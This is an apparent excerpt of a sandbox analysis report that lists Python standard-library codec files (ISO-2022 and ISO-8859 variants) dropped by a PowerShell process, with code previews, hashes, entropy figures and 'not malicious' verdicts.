                                                                                                                                                                                                              Preview:#..# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                              Entropy (8bit):4.645190214359865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:n8q1sOz0f/XojvKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9FcJxFplR:8qnF/62VJjRU8njOxLnrxLbrLKoJxTz
                                                                                                                                                                                                              MD5:E1738D28D315C80A04908CDB21CBE7BD
                                                                                                                                                                                                              SHA1:D79BC1E83E0A2103909A7AB97DB3A456D21C0711
                                                                                                                                                                                                              SHA-256:C8CB592DF0CF38A6B7E8265C02D7784FB32052EF9AD94D0FF369889EDA540273
                                                                                                                                                                                                              SHA-512:BFDF5D44B36916C3B828EA1C599E644CB9D3ADBC0D2D4922F016F9DDD7EB424F8A937C19FA3EFBA0E9F4AC14ADFF3C0BA6B924130ED2D050C3A9BDDC2F4165C2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_jp_2004.py: Python Unicode Codec for ISO2022_JP_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. increme
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1100
                                                                                                                                                                                                              Entropy (8bit):4.625134249310359
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nrq3Oz0f/XojUKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqkFa62VJjRU8njOxLnrxLbrLKnJxTz
                                                                                                                                                                                                              MD5:3E98055A4B7D99A49798F3012C4D9DDB
                                                                                                                                                                                                              SHA1:8579E49AA8080610BF40A51DC18B6DF5EEE56A2E
                                                                                                                                                                                                              SHA-256:2A2AE4368D962C2E7B5DB2F29EE89EFD5A7FDB881DEF523C21670E0D1A1C50CE
                                                                                                                                                                                                              SHA-512:DBA054816FC0022810D545D089BC62997BFE04143B579E59EF1DAD2D25DCAFC879BF00CADEA2DDF3CE850728E00911984590EA8C8C8D6EA1AF30F71AA97CEA76
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_3')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_3',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1108
                                                                                                                                                                                                              Entropy (8bit):4.633181613509048
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:npqNOz0f/XojaKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ycJxFplR:pq2Fg62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                              MD5:34E904E0F16F84EC0A001DFFCDE7514C
                                                                                                                                                                                                              SHA1:19BCD8776FB3239A003F4B5F04B7056B81D0A6C6
                                                                                                                                                                                                              SHA-256:5B4439C7DBE65638166A70C5404CABB72552019D1F497193C6689B86BD3C4C94
                                                                                                                                                                                                              SHA-512:F9DC1EA03840BD9763BC2B1521D2557FD0111682D1FF805FCCDA123508C3F23768F819FA26B2E097447595F70ABCB2737C9B153B848D2687DB3E2E9E645801EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_jp_ext.py: Python Unicode Codec for ISO2022_JP_EXT..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_ext')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_ext',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incremental
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1092
                                                                                                                                                                                                              Entropy (8bit):4.584383388529371
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nJIBqqOz0f/XojfKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFpz:EqHFn62VJjRU8njOxLnrxLbrLKGJxTz
                                                                                                                                                                                                              MD5:F907851FF35FB61EB485B2C163A2BCCB
                                                                                                                                                                                                              SHA1:CA280AC9C832208B01242601F7F3A78803A1CDF9
                                                                                                                                                                                                              SHA-256:FD9EFD7094361F6557D00857E332D7229E922597336A0714FB0FA2402C954029
                                                                                                                                                                                                              SHA-512:4992572D79613856F84F7332C1D7C588B2BA4256613FCAB21BEF6C74BF8D50F2D96CAA2ABFF2C92D040DDFE45A328B7495BCB29CD51580577D5F5A5527CC469D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# iso2022_kr.py: Python Unicode Codec for ISO2022_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13483
                                                                                                                                                                                                              Entropy (8bit):4.571059193460173
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:qHhsuOTDvRAUrXPLouhIAs2+ijLMZt6CJTd12:HTauhIAlEZt680
                                                                                                                                                                                                              MD5:0466703A1EB5752CDD5115B2D738D822
                                                                                                                                                                                                              SHA1:03354F0D1406A99B9934276675759C6002D4A901
                                                                                                                                                                                                              SHA-256:CCFDBA207B483DCD38673D85B6E2A773A5BF64E8AE9DB7E90A01F8014E62B24A
                                                                                                                                                                                                              SHA-512:3D7B957FF194B69AC9DE7FE59BD03DB29EBD076456FC93FD3E6AFB6B09EACB8C5D327A6E17719C02AE5F71E8428BB55FAB633955861699BC4FF90C3F80D0A783
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-1',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13896
                                                                                                                                                                                                              Entropy (8bit):4.591898710758108
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OHhsuOTDvR4UrXPLouhIAs2+ijLWDf6z6iC:bTmuhIAleu+
                                                                                                                                                                                                              MD5:28ADCF051DD15E45A38CE929864BBD83
                                                                                                                                                                                                              SHA1:A09E4C13D00393CE6C2F3CF9665455D74BBF8A0A
                                                                                                                                                                                                              SHA-256:76216C65399DE88B6D40E0BE3209ED7B14D6DD87AFB9C0A984ADDDD0CF6B559F
                                                                                                                                                                                                              SHA-512:13A368308279E76F2D6C3AEF73B66AD4EF4A5A88098FF1A85B403C3C006B3925E25BBB72A6BAC1585CF90D60CF26ADE576CCE484A65E1AE0EC52467370D0507C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-10',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12642
                                                                                                                                                                                                              Entropy (8bit):4.621611083140247
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:gHhsuOTDvRrUrXPLouhIAs2+ijLA00pC8i5I:dTpuhIAlBH8iG
                                                                                                                                                                                                              MD5:8BE69EAC235E74EFCA68174DB8EA6352
                                                                                                                                                                                                              SHA1:28447A4EC5A2111A8B370DECD143F45935EBC454
                                                                                                                                                                                                              SHA-256:5E346F5769E0C3EEB6B5547B954481A821481A970AA8FEC33BFFBF07B880689A
                                                                                                                                                                                                              SHA-512:2E4CB687855A577BDBA8665767BFDD29E95D0952C10C0DA9C2547659629C6DBCD7A95E9C821A1CED7CA4BE5600A95BAEA1D5383AFC9A491E3861A344F1FFAEFB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_11 generated from 'MAPPINGS/ISO8859/8859-11.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-11',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13578
                                                                                                                                                                                                              Entropy (8bit):4.614312894970411
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:oHhsuOTDvRNUrXPLouhIAs2+ijLdyGeyd:1TXuhIAlQGeG
                                                                                                                                                                                                              MD5:89E3297E11801E02B40A23B6180DCD25
                                                                                                                                                                                                              SHA1:EB58BC97EEE69D9DB6670CD439C684057B7A3937
                                                                                                                                                                                                              SHA-256:BEE45734B991C04E76C2ABA2BA8C7208F6BA743324D815DE95965945643D8084
                                                                                                                                                                                                              SHA-512:F8AF2186EC0C3CE5B391999280086ADFD3882425269ECFBCA4D70A33907CE42A1F8F6949D9BE2937FB92300A8235667611DECD358C7E0F8273858B72ADF56CB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-13',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13959
                                                                                                                                                                                                              Entropy (8bit):4.584053979506915
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:mHhsuOTDvR0UrXPLouhIAs2+ijLXwwTdW:DTKuhIAlvwkW
                                                                                                                                                                                                              MD5:445A9BD974736A30077C9BF14106E805
                                                                                                                                                                                                              SHA1:85E673B1E179E5886765F6051ED2F9235063F2F8
                                                                                                                                                                                                              SHA-256:C498772FADF244077B650E468E7922AE1C0DB74ED6984A2A81BC0E088631F0F9
                                                                                                                                                                                                              SHA-512:0D8D322C1DCCB5F2169F402CB82875A10D725F65DFBDE6E70515839CFC8451DD58DD5F938AED1DE25A2C1E74ACEADC7E07889F81C98808ECDE2F6F24D5C73D89
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_14 generated from 'MAPPINGS/ISO8859/8859-14.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-14',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13519
                                                                                                                                                                                                              Entropy (8bit):4.566581461339518
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QHhsuOTDvRnUrXPLouhIAs2+ijLhFsVN6ATdo56G:NTNuhIAl5Fsto
                                                                                                                                                                                                              MD5:0D2C4FB1B7CCD0D085108F651A041593
                                                                                                                                                                                                              SHA1:947AF7C07B789EB743031C3C108BB2FDB882F673
                                                                                                                                                                                                              SHA-256:D703D64AE2D23602E38C2F387EEFFD5D4E5792209BC3CE64928FEE2F99DCD906
                                                                                                                                                                                                              SHA-512:3B24DE05424FBEFC09C8B3743DEA37C4AFEDE5C68A96D0721622D28A6AD42B47D2BB28011F39E6B89AD14B893DB545572537EC741090B880414C26CDF8845EDA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_15 generated from 'MAPPINGS/ISO8859/8859-15.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-15',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13864
                                                                                                                                                                                                              Entropy (8bit):4.596808715275571
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:fiHhsuOTDvRf+UrXPLouhIAs2+ijLOSVCXKm:fvT4uhIAlznm
                                                                                                                                                                                                              MD5:6ED16EE5F05DE02F25349CEBA19AFF51
                                                                                                                                                                                                              SHA1:B036FA26C737669AB311D450BE274CE57845EB9C
                                                                                                                                                                                                              SHA-256:F49FFF248546D510F7ECB5FC2C25C9B68925A2F483B938035CD7A54957A560A2
                                                                                                                                                                                                              SHA-512:18FFEC059B44077627A86139D2861509E28DC8564FC9B5F822C79E21E8A43043780469221B66743D5BFEF84552C3F787E25B721B87B2422A0AFCBCEC84953AE8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_16 generated from 'MAPPINGS/ISO8859/8859-16.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-16',.. enc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13711
                                                                                                                                                                                                              Entropy (8bit):4.594295226318269
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:eHhsuOTDvR1UrXPLouhIAs2+ijLRG3RKjV:rTLuhIAlw4V
                                                                                                                                                                                                              MD5:62DC1A7320D0B8FB3FB535E0F2055446
                                                                                                                                                                                                              SHA1:02D0C9E5D224A0C6036C27C842EC54E3962681C3
                                                                                                                                                                                                              SHA-256:D9102AE464030E5A0F4D1712435AC3BDB2FA98ECAA689B5965442EF92B13DFEC
                                                                                                                                                                                                              SHA-512:29D58449D2B6216C9BB40E151E0133FC370D104C07C6960581B914495C8940B2B7C7B85E70514EB0D37313854A8EC2BDC3163406881B4521262CEBF26A385EAE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_2 generated from 'MAPPINGS/ISO8859/8859-2.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-2',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13396
                                                                                                                                                                                                              Entropy (8bit):4.597193229637006
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:uHhsuOTDvRCUrXPLouhIAs2+ijLA/SI7JbrO:7TIuhIAltIBC
                                                                                                                                                                                                              MD5:79D790F88E256CC8C968456344519BAB
                                                                                                                                                                                                              SHA1:6EA401BBD3082D55BA2235D768A80BEA52E4759A
                                                                                                                                                                                                              SHA-256:E372E25B32E8657DB9B57B3C9B53D68B67F3FC6651C53B071DCAC6CAB6662FCA
                                                                                                                                                                                                              SHA-512:EDB436E11FE172A73DD899E163F3D05D1DB6214755FCCCD7311A1923EF5EE8F7530D353D1EEB9BE8B9E435F250509CD114CE540BC4F928B32000A64E05EB4E9C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-3',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13683
                                                                                                                                                                                                              Entropy (8bit):4.589930243244332
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yHhsuOTDvRvUrXPLouhIAs2+ijL4Eo6z+:/T5uhIAlhb+
                                                                                                                                                                                                              MD5:4C0E2E5478CFC6B2A8134D5C5D3C76ED
                                                                                                                                                                                                              SHA1:73749BA58832D716683A2F76354BB032A3123E78
                                                                                                                                                                                                              SHA-256:164C26A1A13DC22A21A7F80E5C0176EA9223111B759D2ED1CD8B3C55AAB63BBD
                                                                                                                                                                                                              SHA-512:C469837BC68A419D91FD8EB0D52A2164D557C3EEBDA6E7F2B1040D18DFC6F94BDA827CFAC0EF44BF8F19DDE6B732A9AF3A48214EE0AFB143600D3D77E98F1C59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec iso8859_4 generated from 'MAPPINGS/ISO8859/8859-4.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-4',.. encode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13322
                                                                                                                                                                                                              Entropy (8bit):4.619153100357495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:iHhsuOTDvRcUrXPLouhIAs2+ijL762Y+n:vT2uhIAlT62n
                                                                                                                                                                                                              MD5:70CB514B7CD7B9A494A55CB257553431
                                                                                                                                                                                                              SHA1:7F689F78B422164FDA39F897B45AAE7C8CCFE8DB
